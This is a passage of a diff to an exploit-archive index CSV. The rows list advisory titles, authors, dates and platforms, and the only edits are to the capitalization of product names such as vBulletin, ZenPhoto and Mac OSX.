2.0.8 - '.m3u' Local Crash PoC",2013-08-19,Asesino04,windows,dos,0 27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - Common.php Remote File Inclusion",2006-04-20,r0t,php,webapps,0 27708,platforms/php/webapps/27708.txt,"EasyGallery 1.17 - EasyGallery.php Cross-Site Scripting",2006-04-20,botan,php,webapps,0 -27709,platforms/php/webapps/27709.txt,"4homepages 4images 1.7 - Member.php Cross-Site Scripting",2006-04-20,Qex,php,webapps,0 +27709,platforms/php/webapps/27709.txt,"4homepages 4Images 1.7 - Member.php Cross-Site Scripting",2006-04-20,Qex,php,webapps,0 27710,platforms/php/webapps/27710.txt,"W2B Online Banking - SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0 27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - inc/function.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 @@ -24810,12 +24810,12 @@ id,file,description,date,author,platform,type,port 27704,platforms/windows/remote/27704.rb,"Cogent DataHub - HTTP Server Buffer Overflow",2013-08-19,Metasploit,windows,remote,0 27705,platforms/multiple/remote/27705.rb,"Java - storeImageArray() Invalid Array Indexing",2013-08-19,Metasploit,multiple,remote,0 27706,platforms/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",hardware,remote,0 -28694,platforms/php/webapps/28694.txt,"VBulletin 2.3.x - Global.php SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +28694,platforms/php/webapps/28694.txt,"vBulletin 2.3.x - Global.php SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 27711,platforms/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",php,webapps,0 27712,platforms/cgi/webapps/27712.txt,"Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0 27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 - MWguest.php HTML Injection",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0 -27714,platforms/osx/dos/27714.txt,"Apple Mac OS X 10.x - LZWDecodeVector (.tiff) Overflow",2006-04-20,"Tom Ferris",osx,dos,0 -27715,platforms/osx/dos/27715.txt,"Apple Mac OS X 10.x - '.zip' Parsing BOMStackPop() Function Overflow",2006-04-20,"Tom Ferris",osx,dos,0 +27714,platforms/osx/dos/27714.txt,"Apple Mac OSX 10.x - LZWDecodeVector (.tiff) Overflow",2006-04-20,"Tom Ferris",osx,dos,0 +27715,platforms/osx/dos/27715.txt,"Apple Mac OSX 10.x - '.zip' Parsing BOMStackPop() Function Overflow",2006-04-20,"Tom Ferris",osx,dos,0 27716,platforms/multiple/remote/27716.txt,"Asterisk Recording Interface 0.7.15 - Audio.php Information Disclosure",2006-04-21,"Francois Harvey",multiple,remote,0 27717,platforms/php/webapps/27717.txt,"phpldapadmin 0.9.8 - compare_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 27718,platforms/php/webapps/27718.txt,"phpldapadmin 0.9.8 - copy_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 @@ -24847,7 +24847,7 @@ id,file,description,date,author,platform,type,port 27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 (PASS Command) - SEH Buffer Overflow",2013-08-21,Wireghoul,windows,remote,21 27749,platforms/hardware/dos/27749.rb,"Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service",2013-08-21,"Arash Abedian",hardware,dos,0 27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel - gate2.php Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 -27751,platforms/php/webapps/27751.txt,"WordPress ThinkIT Plugin 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0 +27751,platforms/php/webapps/27751.txt,"Wordpress ThinkIT Plugin 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0 27752,platforms/unix/remote/27752.rb,"Graphite Web - Unsafe Pickle Handling",2013-08-21,Metasploit,unix,remote,0 27753,platforms/hardware/webapps/27753.txt,"Samsung DVR Firmware 1.10 - Authentication Bypass",2013-08-21,"Andrea Fabrizi",hardware,webapps,80 27754,platforms/windows/remote/27754.txt,"Oracle Java - BytePackedRaster.verify() Signed Integer Overflow",2013-08-21,"Packet Storm",windows,remote,0 @@ -24888,13 +24888,13 @@ id,file,description,date,author,platform,type,port 27787,platforms/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injections",2006-05-01,r0t,php,webapps,0 27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 - signup.php referral Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 27789,platforms/php/webapps/27789.txt,"OrbitHYIP 2.0 - members.php id Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 -27790,platforms/osx/dos/27790.txt,"Apple Mac OS X 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos,0 +27790,platforms/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos,0 27791,platforms/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,linux,dos,0 27792,platforms/php/webapps/27792.txt,"SunShop Shopping Cart 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-01,r0t,php,webapps,0 27793,platforms/php/webapps/27793.txt,"Collaborative Portal Server 3.4 - POS Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 27794,platforms/php/webapps/27794.txt,"JSBoard 2.0.10/2.0.11 - Login.php Cross-Site Scripting",2006-05-02,"Alexander Klink",php,webapps,0 -27795,platforms/php/webapps/27795.txt,"zenphoto 0.9/1.0 - i.php a Parameter Cross-Site Scripting",2006-05-02,zone14,php,webapps,0 -27796,platforms/php/webapps/27796.txt,"zenphoto 0.9/1.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-05-02,zone14,php,webapps,0 +27795,platforms/php/webapps/27795.txt,"ZenPhoto 0.9/1.0 - i.php a Parameter Cross-Site Scripting",2006-05-02,zone14,php,webapps,0 +27796,platforms/php/webapps/27796.txt,"ZenPhoto 0.9/1.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-05-02,zone14,php,webapps,0 27797,platforms/php/webapps/27797.txt,"XDT Pro 2.3 - Stats.php Cross-Site Scripting",2006-05-02,almaster,php,webapps,0 27798,platforms/php/webapps/27798.txt,"GeoBlog MOD_1.0 - Viewcat.php Cross-Site Scripting",2006-05-02,SubjectZero,php,webapps,0 27799,platforms/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 - Server_day_stats.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps,0 @@ -24970,7 +24970,7 @@ id,file,description,date,author,platform,type,port 27873,platforms/hardware/remote/27873.txt,"Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution PoC",2013-08-26,Aodrulez,hardware,remote,0 27874,platforms/windows/local/27874.py,"WinAmp 5.63 - (winamp.ini) Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0 27875,platforms/linux/dos/27875.c,"libtiff 3.9.5 - Integer Overflow",2013-08-26,x90c,linux,dos,0 -27876,platforms/php/webapps/27876.txt,"Musicbox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps,0 +27876,platforms/php/webapps/27876.txt,"MusicBox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps,0 27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server - Remote Command Execution",2013-08-26,Metasploit,windows,remote,7770 27878,platforms/hardware/webapps/27878.txt,"Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities",2013-08-26,"Craig Young",hardware,webapps,0 27879,platforms/php/webapps/27879.txt,"Joomla! VirtueMart Component 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps,0 @@ -25001,7 +25001,7 @@ id,file,description,date,author,platform,type,port 27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x / DoceboKms 3.0.3 / Docebo CMS 3.0.x - Multiple Remote File Inclusion",2006-05-23,Kacper,php,webapps,0 27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x - Lang Parameter Multiple Remote File Inclusion",2006-05-26,beford,php,webapps,0 27906,platforms/windows/dos/27906.txt,"Microsoft Internet Explorer 6.0 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",windows,dos,0 -27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 - Show.php SQL Injection",2006-05-27,SwEET-DeViL,php,webapps,0 +27907,platforms/php/webapps/27907.txt,"SaphpLesson 2.0 - Show.php SQL Injection",2006-05-27,SwEET-DeViL,php,webapps,0 27908,platforms/php/webapps/27908.txt,"Chipmunk 1.4 - Guestbook Index.php Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 27909,platforms/php/webapps/27909.txt,"Chipmunk Directory - 'index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 27910,platforms/php/webapps/27910.txt,"AR-Blog 5.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-27,black-code,php,webapps,0 @@ -25026,7 +25026,7 @@ id,file,description,date,author,platform,type,port 27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 - Portal.php SQL Injection",2006-05-31,SpC-x,php,webapps,0 27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0 27931,platforms/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",multiple,remote,0 -27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 - Unauthorized Access",2006-05-01,omnipresent,asp,webapps,0 +27932,platforms/asp/webapps/27932.txt,"Hogstorps GuestBook 2.0 - Unauthorized Access",2006-05-01,omnipresent,asp,webapps,0 27933,platforms/php/webapps/27933.txt,"Tekno.Portal - Bolum.php SQL Injection",2006-06-01,SpC-x,php,webapps,0 27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - Content.php SQL Injection",2006-06-01,SpC-x,php,webapps,0 27994,platforms/php/webapps/27994.txt,"Open Business Management 1.0.3 pl1 - publication_index.php tf_lang Parameter Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 @@ -25034,13 +25034,13 @@ id,file,description,date,author,platform,type,port 27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 - user_index.php tf_lastname Parameter Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 - list_index.php Multiple Parameter Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 - 'index.php' Remote File Inclusion",2006-08-16,O.U.T.L.A.W,php,webapps,0 -27938,platforms/linux/local/27938.rb,"VMware - Setuid vmware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0 +27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0 27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution",2013-08-29,Metasploit,windows,remote,0 27940,platforms/windows/remote/27940.rb,"Firefox - XMLSerializer Use-After-Free",2013-08-29,Metasploit,windows,remote,0 27941,platforms/php/remote/27941.rb,"SPIP - connect Parameter PHP Injection",2013-08-29,Metasploit,php,remote,0 27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0 27943,platforms/windows/remote/27943.txt,"Oracle Java - ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote,0 -27944,platforms/osx/local/27944.rb,"Mac OS X - Sudo Password Bypass",2013-08-29,Metasploit,osx,local,0 +27944,platforms/osx/local/27944.rb,"Mac OSX - Sudo Password Bypass",2013-08-29,Metasploit,osx,local,0 27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,asp,webapps,0 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 @@ -25058,7 +25058,7 @@ id,file,description,date,author,platform,type,port 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - Viewmsg.asp SQL Injection",2006-06-02,ajann,asp,webapps,0 27961,platforms/php/webapps/27961.txt,"PHPBB 2.0.x - Template.php Remote File Inclusion",2006-06-02,Canberx,php,webapps,0 -27962,platforms/php/webapps/27962.txt,"IBWd Guestbook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 +27962,platforms/php/webapps/27962.txt,"IBWd GuestBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 27964,platforms/php/webapps/27964.txt,"CoolForum 0.x - Editpost.php SQL Injection",2006-06-05,DarkFig,php,webapps,0 27965,platforms/osx/local/27965.py,"OSX 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 @@ -25107,7 +25107,7 @@ id,file,description,date,author,platform,type,port 28027,platforms/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0 28028,platforms/php/webapps/28028.txt,"vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,php,webapps,0 28060,platforms/php/webapps/28060.txt,"Datecomm 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-19,Luny,php,webapps,0 -28059,platforms/php/webapps/28059.txt,"SAPHPLesson 1.1/2.0/3.0 - Multiple SQL Injections",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 +28059,platforms/php/webapps/28059.txt,"SaphpLesson 1.1/2.0/3.0 - Multiple SQL Injections",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28030,platforms/unix/remote/28030.txt,"Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting",2006-06-15,"Thomas Liam Romanis",unix,remote,0 28031,platforms/php/webapps/28031.txt,"HotPlug CMS 1.0 - Login1.php Cross-Site Scripting",2006-06-15,"Federico Fazzi",php,webapps,0 28032,platforms/php/webapps/28032.txt,"MPCS 0.2 - Comment.php Cross-Site Scripting",2006-03-06,Luny,php,webapps,0 @@ -25136,13 +25136,13 @@ id,file,description,date,author,platform,type,port 28073,platforms/php/webapps/28073.txt,"V3 Chat Instant Messenger - profileview.php membername Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28074,platforms/php/webapps/28074.txt,"V3 Chat Instant Messenger - expire.php cust_name Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - mycontacts.php membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps,0 -28076,platforms/php/webapps/28076.txt,"Vbulletin 3.0.9/3.5.x - Member.php Cross-Site Scripting",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 +28076,platforms/php/webapps/28076.txt,"vBulletin 3.0.9/3.5.x - Member.php Cross-Site Scripting",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 28077,platforms/linux/dos/28077.txt,"GnuPG 1.4.3/1.9.x - Parse_User_ID Remote Buffer Overflow",2006-06-20,"Evgeny Legerov",linux,dos,0 28078,platforms/php/webapps/28078.txt,"e107 0.7.5 - Subject field HTML Injection",2006-06-21,"EllipSiS Security",php,webapps,0 28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0 28079,platforms/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - (.wav) Crash PoC",2013-09-04,ariarat,windows,dos,0 28080,platforms/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 - (.wav) Crash PoC",2013-09-04,ariarat,windows,dos,0 -28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 / OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 +28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 / OSX 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)",2013-09-04,Metasploit,windows,remote,0 28083,platforms/windows/remote/28083.rb,"HP LoadRunner - lrFileIOService ActiveX WriteFileString Remote Code Execution",2013-09-04,Metasploit,windows,remote,0 28086,platforms/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 - Error_msg Parameter Cross-Site Scripting",2006-06-21,"Charles Hooper",asp,webapps,0 @@ -25192,7 +25192,7 @@ id,file,description,date,author,platform,type,port 28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 28134,platforms/php/webapps/28134.txt,"newsPHP 2006 PRO - inc/rss_feed.php category Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 -28135,platforms/osx/dos/28135.pl,"Apple Mac OS X 10.4.x - OpenLDAP Denial of Service",2006-06-27,"Mu Security research",osx,dos,0 +28135,platforms/osx/dos/28135.pl,"Apple Mac OSX 10.4.x - OpenLDAP Denial of Service",2006-06-27,"Mu Security research",osx,dos,0 28136,platforms/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 - Diver.php SQL Injection",2006-06-23,DarkFig,php,webapps,0 28137,platforms/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 - insertmember.php city Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 - lostpassword.php PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 @@ -25260,15 +25260,15 @@ id,file,description,date,author,platform,type,port 28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 - Topics.php SQL Injection",2006-07-10,Paisterist,php,webapps,0 28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6.0 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0 28203,platforms/asp/webapps/28203.txt,"Hosting Controller 1.x - Error.asp Cross-Site Scripting",2006-07-11,Dea7h,asp,webapps,0 -28204,platforms/php/webapps/28204.txt,"SaPHPLesson 2.0 - Add.php SQL Injection",2006-07-11,C.B.B.L,php,webapps,0 +28204,platforms/php/webapps/28204.txt,"SaphpLesson 2.0 - Add.php SQL Injection",2006-07-11,C.B.B.L,php,webapps,0 28205,platforms/php/webapps/28205.txt,"FlexWATCH Network Camera - Cross-Site Scripting",2006-06-11,"Jaime Blasco",php,webapps,0 28206,platforms/php/webapps/28206.txt,"Fantastic GuestBook 2.0.1 - GuestBook.php HTML Injection",2006-07-11,omnipresent,php,webapps,0 28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6.0 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0 28208,platforms/asp/webapps/28208.txt,"FlexWatch 3.0 - AIndex.asp Authorization Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - player.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 28210,platforms/multiple/remote/28210.txt,"FLV Players 8 - popup.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 -28211,platforms/php/webapps/28211.txt,"Lazarus Guestbook 1.6 - codes-english.php show Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 -28212,platforms/php/webapps/28212.txt,"Lazarus Guestbook 1.6 - picture.php img Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 +28211,platforms/php/webapps/28211.txt,"Lazarus GuestBook 1.6 - codes-english.php show Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 +28212,platforms/php/webapps/28212.txt,"Lazarus GuestBook 1.6 - picture.php img Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6.0 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0 28214,platforms/php/webapps/28214.txt,"PhotoCycle 1.0 - PhotoCycle.php Parameter Cross-Site Scripting",2006-07-13,Luny,php,webapps,0 28215,platforms/php/webapps/28215.txt,"PHP Event Calendar 1.4 - Calendar.php Remote File Inclusion",2006-07-13,Solpot,php,webapps,0 @@ -25335,7 +25335,7 @@ id,file,description,date,author,platform,type,port 28280,platforms/php/webapps/28280.txt,"wwwThreads - Calendar.php Cross-Site Scripting",2006-07-26,l2odon,php,webapps,0 28281,platforms/php/webapps/28281.txt,"phpbb-auction 1.x - auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28282,platforms/php/webapps/28282.txt,"phpbb-auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 -28283,platforms/hardware/webapps/28283.txt,"ZyXEL Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0 +28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0 28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0 28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 - NDFXArtEffects Stack Overflow",2006-07-27,hdm,windows,dos,0 28287,platforms/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory",2006-07-27,anonymous,linux,local,0 @@ -25346,9 +25346,9 @@ id,file,description,date,author,platform,type,port 28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0 28293,platforms/multiple/dos/28293.txt,"Oracle 10g - Alter Session Integer Overflow",2006-07-27,"putosoft softputo",multiple,dos,0 28294,platforms/php/webapps/28294.txt,"PHP-Nuke - INP Modules.php Cross-Site Scripting",2006-07-28,l2odon,php,webapps,0 -28295,platforms/php/webapps/28295.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla - wp-comments-post.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 -28296,platforms/php/webapps/28296.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla - wp-feed.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 -28297,platforms/php/webapps/28297.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla - wp-trackback.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 +28295,platforms/php/webapps/28295.txt,"JD-Wordpress 2.0-1.0 RC 2 for Joomla - wp-comments-post.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 +28296,platforms/php/webapps/28296.txt,"JD-Wordpress 2.0-1.0 RC 2 for Joomla - wp-feed.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 +28297,platforms/php/webapps/28297.txt,"JD-Wordpress 2.0-1.0 RC 2 for Joomla - wp-trackback.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 28298,platforms/windows/remote/28298.txt,"Yahoo! Messenger 7.0/7.5 - Remote Search String Arbitrary Browser Navigation",2006-07-28,"Ivan Ivan",windows,remote,0 28299,platforms/windows/dos/28299.pl,"Microsoft Windows XP/2000/2003 - Graphical Device Interface Plus Library Denial of Service",2006-07-29,"Mr. Niega",windows,dos,0 28300,platforms/php/webapps/28300.txt,"Advanced Webhost Billing System 2.2.2 - Contact.php Multiple Cross-Site Scripting Vulnerabilities",2006-07-29,newbinaryfile,php,webapps,0 @@ -25364,7 +25364,7 @@ id,file,description,date,author,platform,type,port 28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0 28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - Myevent.php Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 28312,platforms/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",multiple,remote,0 -28314,platforms/linux/remote/28314.c,"bomberclone 0.11 - Multiple Vulnerabilities",2006-07-31,"Luigi Auriemma",linux,remote,0 +28314,platforms/linux/remote/28314.c,"BomberClone 0.11 - Multiple Vulnerabilities",2006-07-31,"Luigi Auriemma",linux,remote,0 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - Module.php Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 @@ -25383,7 +25383,7 @@ id,file,description,date,author,platform,type,port 28330,platforms/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28331,platforms/windows/remote/28331.txt,"Oracle Java - ShortComponentRaster.verify() Memory Corruption",2013-09-17,"Packet Storm",windows,remote,0 28332,platforms/linux/local/28332.rb,"Sophos Web Protection Appliance - clear_keys.pl Privilege Escalation",2013-09-17,Metasploit,linux,local,0 -28333,platforms/unix/remote/28333.rb,"D-Link Devices - UPnP SOAP Telnetd Command Execution",2013-09-17,Metasploit,unix,remote,49152 +28333,platforms/unix/remote/28333.rb,"D-Link Devices - UPnP SOAP TelnetD Command Execution",2013-09-17,Metasploit,unix,remote,49152 28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack - Arbitrary Command Execution",2013-09-17,Metasploit,linux,remote,443 28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security - Privilege Escalation",2013-09-17,Metasploit,windows,local,0 28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443 @@ -25392,7 +25392,7 @@ id,file,description,date,author,platform,type,port 28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 - Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0 28340,platforms/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",multiple,webapps,0 28341,platforms/windows/dos/28341.txt,"Yahoo! Messenger 8.0.0.863 - File Extension Spoofing",2006-08-04,ivancool2003,windows,dos,0 -28342,platforms/php/webapps/28342.txt,"VBulletin 3.0.14 - global.php Encoded URL Cross-Site Scripting",2006-08-05,imei,php,webapps,0 +28342,platforms/php/webapps/28342.txt,"vBulletin 3.0.14 - global.php Encoded URL Cross-Site Scripting",2006-08-05,imei,php,webapps,0 28343,platforms/windows/dos/28343.txt,"Microsoft Internet Explorer 6.0/7.0 - IFrame Refresh Denial of Service",2006-08-06,"Thomas Pollet",windows,dos,0 28344,platforms/multiple/remote/28344.txt,"DConnect Daemon - Listen Thread UDP Remote Buffer Overflow",2006-08-06,"Luigi Auriemma",multiple,remote,0 28345,platforms/multiple/dos/28345.txt,"DConnect Daemon DC Chat - Denial of Service",2006-08-06,"Luigi Auriemma",multiple,dos,0 @@ -25412,7 +25412,7 @@ id,file,description,date,author,platform,type,port 28359,platforms/php/webapps/28359.txt,"PHPPrintAnalyzer 1.1 - 'index.php' Remote File Inclusion",2006-08-07,sh3ll,php,webapps,0 28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 - Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote,0 28361,platforms/multiple/dos/28361.c,"Festalon 0.5 - .HES Files Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0 -28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0 +28362,platforms/php/webapps/28362.txt,"Simple One File GuestBook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL 